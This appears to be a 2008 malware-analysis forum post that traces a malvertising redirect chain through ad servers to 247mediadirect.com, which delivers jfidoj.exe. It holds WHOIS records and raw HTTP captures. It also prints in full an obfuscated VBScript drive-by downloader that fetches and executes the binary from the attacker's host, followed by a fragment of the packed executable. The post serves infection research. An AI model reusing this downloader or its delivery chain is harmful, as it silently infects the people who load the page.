jfidoj.exe - 247mediadirect.com - 194.126.193.160
The infection comes now from
247mediadirect.com - 194.126.193.160.
Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-18
Expires: 2009-05-18
Updated: 2008-05-19
Name Server: NS0.DIRECTNIC.COM (has 354,782 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com
IP Address: 194.126.193.160
IP Location - Noord-holland - Amsterdam - Easycarrier-ipv
Dedicated Hosting: 247mediadirect.com is hosted on a dedicated server.
Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830
Domain Name: 247MEDIADIRECT.COM
Administrative Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830
Technical Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830
Record expires on 05-19-2009
Record created on 05-19-2008
Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245
Network traces
CODE
GET http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=617;spotId=7094;c=0;ms=1214666468209
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adbrite.com
Proxy-Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI NID"
Set-Cookie: b=4190%3A%3Adh8i%2C3ygf%2C4190; expires=Sun, 28-Jun-2009 15:21:24 GMT; path=/; domain=.adbrite.com
Content-type: text/html
Date: Sat, 28 Jun 2008 15:21:24 GMT
Server: lighttpd/1.4.19
165
<html> <head> </head> <body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- BEGIN STANDARD TAG - 468 x 60 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=468 HEIGHT=60 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60ion=321066"></IFRAME>
<!-- END TAG --> </body> </html>
0
The page below contains our next location, being 247mediadirect.com/media/1/9550/468x60
CODE
GET http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60ion=321066 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.yieldmanager.com
Proxy-Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 28 Jun 2008 15:21:25 GMT
Server: Right Media Ad Server/405
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: fl_inst=; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=created=1214666436&lastCounted=1214666436&uid=c25febc6-4525-11dd-ae82-001e0b5a03f8&_hmacv=1&_salt=85413568&_keyid=k1&_hmac=2a5197aaa08d2d9c1aa26fb0820bc6ce0072fe77; expires=Mon, 28-Jul-2008 15:21:25 GMT
Set-Cookie: lifb=sP.YoIgkW70<%QS<We8e*McuM; expires=Sat, 05-Jul-2008 15:21:25 GMT
Set-Cookie: vuday1=oEKx`B[ApMNG's!Ywi5s; expires=Sun, 29-Jun-2008 00:00:00 GMT
Set-Cookie: fl_inst=1; expires=Thu, 25-Dec-2008 15:21:25 GMT
Set-Cookie: pv1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: pc1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ih="b!!!!'!#[,7!!!!#:9osF!#[AA!!!!#:9osk!#]`b!!!!#:9osu!#^@.!!!!#:9osK"; path=/; expires=Mon, 28-Jun-2010 15:21:25 GMT
Set-Cookie: vh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ia="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Location: http://247mediadirect.com/media/1/9550/468x60
Cache-Control: no-store
Last-Modified: Sat, 28 Jun 2008 15:21:25 GMT
Pragma: no-cache
Content-Length: 0
Connection: close
From there on, we retrieve the banner to be displayed and an iframe pointing to 247mediadirect.com/jh/f.php?id=9550
CODE
GET http://247mediadirect.com/media/1/9550/468x60 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
~~~~~~~~~~~~~~: ~~~
Content-Type: text/html
152
<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9550/97" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40370.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9550" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML>
0
The banner.
CODE
GET http://247mediadirect.com/ad/images/468x60/40370.gif HTTP/1.1
Accept: */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive


247mediadirect.com/jh/f.php?id=9550 contains a VBS script to contruct the next URL.
CODE
GET http://247mediadirect.com/jh/f.php?id=9550 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:46 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
~~~~~~~~~~~~~~: ~~~~
Content-Type: text/html
16C
<br />
<b>Warning</b>: mysql_pconnect() [<a href='function.mysql-pconnect'>function.mysql-pconnect</a>]: Too many connections in <b>/www/htdocs/jh/f.php</b> on line <b>38</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /www/htdocs/jh/f.php:38) in <b>/www/htdocs/jh/f.php</b> on line <b>49</b><br />
185B
<script language="VBScript">
</script>
<script language="javascript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
//-->
</script>
<script language="VBScript">
Dim s
str=""
s = Array& #40;74,105,27,64,109,109,106,109,27,77,96,110,112,104,96,27,73,96,115,111,5,110,
96,111,27,95,27,56,27,95,106,94,112,104,96,105,111,41,94,109,96,92,111,96,96,103
,96,104,96,105,111,35,29,106,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29
,33,29,111,29,36,5,63,100,104,27,100,95,110,35,44,47,36,5,100,95,110,35,43,36,27
,27,56,27,29,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,6
0,40,43,43,62,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,44,36,27,27,56,27,29
,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,60,40,43,43,6
2,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,45,36,27,27,56,27,29,60,61,52,61
,62,64,63,63,40,64,62,50,64,40,47,50,64,44,40,52,46,45,45,40,63,47,60,45,44,43,4
9,44,50,44,44,49,29,5,100,95,110,35,46,36,27,27,56,27,29,43,43,43,49,65,43,46,46
,40,43,43,43,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,4
7,49,29,5,100,95,110,35,47,36,27,27,56,27,29,43,43,43,49,65,43,46,60,40,43,43,43
,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,47,49,29,5,10
0,95,110,35,48,36,27,27,56,27,29,49,96,46,45,43,50,43,92,40,50,49,49,95,40,47,96
,96,49,40,51,50,52,94,40,95,94,44,97,92,52,44,95,45,97,94,46,29,5,100,95,110,35,
49,36,27,27,56,27,29,49,47,44,47,48,44,45,61,40,61,52,50,51,40,47,48,44,63,40,60
,43,63,51,40,65,62,65,63,65,46,46,64,51,46,46,62,29,5,100,95,110,35,50,36,27,27,
56,27,29,50,65,48,61,50,65,49,46,40,65,43,49,65,40,47,46,46,44,40,51,60,45,49,40
,46,46,52,64,43,46,62,43,60,64,46,63,29,5,100,95,110,35,51,36,27,27,56,27,29,43,
49,50,45,46,64,43,52,40,65,47,62,45,40,47,46,94,51,40,51,46,48,51,40,43,52,65,62
,63,44,63,61,43,50,49,49,29,5,100,95,110,35,52,36,27,27,56,27,29,49,46,52,65,50,
45,48,65,40,44,61,45,63,40,47,51,46,44,40,60,52,65,63,40,51,50,47,51,47,50,49,51
,45,43,44,43,29,5,100,95,110,35,44,43,36,27,56,27,29,61,60,43,44,51,48,52,52,40,
44,63,61,46,40,47,47,97,52,40,51,46,61,47,40,47,49,44,47,48,47,62,51,47,61,65,51
,29,5,100,95,110,35,44,44,36,27,56,27,29,63,43,62,43,50,63,48,49,40,50,62,49,52,
40,47,46,65,44,40,61,47,60,43,40,45,48,65,48,60,44,44,65,60,61,44,52,29,5,100,95
,110,35,44,45,36,27,56,27,29,64,51,62,62,62,63,63,65,40,62,60,45,51,40,47,52,49,
93,40,61,43,48,43,40,49,62,43,50,62,52,49,45,47,50,49,61,29,5,97,106,109,27,100,
27,56,27,43,27,111,106,27,44,46,5,27,27,27,27,27,27,27,27,95,41,110,96,111,92,11
1,111,109,100,93,112,111,96,27,29,94,29,33,29,103,29,33,29,92,29,33,29,110,29,33
,29,110,29,33,29,100,29,33,29,95,29,39,27,29,94,29,33,29,103,29,33,29,110,29,33,
29,100,29,33,29,95,29,33,29,53,29,33,100,95,110,35,100,36,5,27,27,27,27,27,27,27
,27,110,96,111,27,92,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,
29,72,29,33,29,100,29,33,29,94,29,33,29,109,29,33,29,106,29,33,29,110,29,33,29,1
06,29,33,29,97,29,33,29,111,29,33,29,41,29,33,29,83,29,33,29,72,29,33,29,71,29,3
3,29,67,29,33,29,79,29,33,29,79,29,33,29,75,29,39,29,29,36,5,27,27,27,27,27,27,2
7,27,100,97,27,96,109,109,41,105,112,104,93,96,109,27,27,56,27,43,27,111,99,96,1
05,5,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,10
9,5,27,27,27,27,27,27,27,27,96,105,95,27,100,97,5,105,96,115,111,5,110,96,111,27
,96,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,78,29,33,29,94
,29,33,29,109,29,33,29,100,29,33,29,107,29,33,29,111,29,33,29,100,29,33,29,105,2
9,33,29,98,29,33,29,41,29,33,29,65,29,33,29,100,29,33,29,103,29,33,29,96,29,33,2
9,78,29,33,29,116,29,33,29,110,29,33,29,111,29,33,29,96,29,33,29,104,29,33,29,74
,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29,33,29,111,29,39,29,29,36,5,
110,96,111,27,98,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,6
0,29,33,29,95,29,33,29,106,29,33,29,95,29,33,29,93,29,33,29,41,29,33,29,78,29,33
,29,111,29,33,29,109,29,33,29,96,29,33,29,92,29,33,29,104,29,39,29,29,36,5,97,10
6,109,27,100,27,56,27,43,27,111,106,27,48,5,27,27,27,100,97,27,100,27,56,27,43,2
7,111,99,96,105,27,115,27,56,27,29,94,53,87,114,100,105,95,106,114,110,87,111,96
,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,44,27,111,99,96,105,27,11
5,27,56,27,29,94,53,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56
,27,45,27,111,99,96,105,27,115,27,56,27,29,94,53,87,111,104,107,29,27,96,103,110
,96,27,100,97,27,100,27,56,27,46,27,111,99,96,105,27,115,27,56,27,29,94,53,87,11
4,100,105,105,111,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,2
7,47,27,111,99,96,105,27,115,27,56,27,29,94,53,87,29,27,96,105,95,27,100,97,5,27
,27,27,99,27,56,27,96,41,93,112,100,103,95,107,92,111,99,35,115,39,29,87,101,97,
100,95,106,101,41,96,115,96,29,36,5,27,27,27,98,41,111,116,107,96,27,56,27,44,5,
27,27,27,92,41,106,107,96,105,27,29,66,29,33,29,64,29,33,29,79,29,39,27,29,99,11
1,111,107,53,42,42,45,47,50,104,96,95,100,92,95,100,109,96,94,111,41,94,106,104,
42,93,93,93,41,107,99,107,42,44,45,44,47,49,52,46,51,43,49,42,48,95,97,93,48,44,
92,49,50,97,49,45,51,48,47,50,50,43,95,51,92,49,52,96,45,96,43,94,95,50,44,94,41
,96,115,96,58,92,97,97,100,95,56,52,48,48,43,29,39,27,43,5,27,27,27,92,41,110,96
,105,95,5,27,27,27,98,41,106,107,96,105,5,27,27,27,98,41,114,109,100,111,96,27,9
2,41,109,96,110,107,106,105,110,96,93,106,95,116,5,27,27,27,98,41,110,92,113,96,
111,106,97,100,103,96,27,99,39,45,5,27,27,27,98,41,94,103,106,110,96,5,27,27,27,
100,97,27,96,109,109,41,105,112,104,93,96,109,27,55,57,27,43,27,111,99,96,105,5,
27,27,27,27,27,27,27,27,64,109,109,41,62,103,96,92,109,5,27,27,27,96,103,110,96,
5,27,27,27,27,27,27,27,27,110,96,111,27,100,27,56,27,95,41,94,109,96,92,111,96,1
06,93,101,96,94,111,35,29,110,29,33,29,99,29,33,29,96,29,33,29,103,29,33,29,103,
29,33,29,41,29,33,29,92,29,33,29,107,29,33,29,107,29,33,29,103,29,33,29,100,29,3
3,29,94,29,33,29,92,29,33,29,111,29,33,29,100,29,33,29,106,29,33,29,105,29,39,29
,29,36,5,27,27,27,27,27,27,27,27,100,41,110,99,96,103,103,96,115,96,94,112,111,9
6,27,99,39,29,29,39,29,29,39,29,106,29,33,29,107,29,33,29,96,29,33,29,105,29,39,
43,5,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,109,5,27,27,27,64,105,95,2
7,100,97,5,105,96,115,111)
For i = 0 to UBound(s)
str = str & chr(s(i) + 5)
Next
Execute(str)
</script>
0
Execute(str) leads us to the next location where we start to download jfidoj.exe.
CODE
GET http://247mediadirect.com/bbb.php/1214693806/5dfb51a67f62854770d8a69e2e0cd71c.exe?affid=9550 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 28 Jun 2008 22:56:48 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
Content-Length: 29760
Content-Type: application/octet-stream
MZ@ !L!This program cannot be run in DOS mode.
$̰gsgsgs{gsgrgsx`gsAxgs3{}gsAygswaugsRichgsPEL7THpPp`@``UPX0PUPX1p`n@.rsrcr@3.10UPX!
F i&344_ݤY0Z?!a/fdz6:q 1S6Ə9J-
Note: some of the GET URLs have been broken into 3 lines for visibility reasons.
Notes
Launches itself with the command line parameter 1

For changes and behavior please see Technical details & Notes in
post #1. This version of jfidoj.exe creates 2 additional files.
QUOTE
c:\WINDOWS\system32\42g1275i.exe.a_a
Date: 6/28/2008 6:08 PM
Size: 0 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\1Ll5OSVH.hdi
date: 6/28/2008 6:09 PM
size: 0 bytes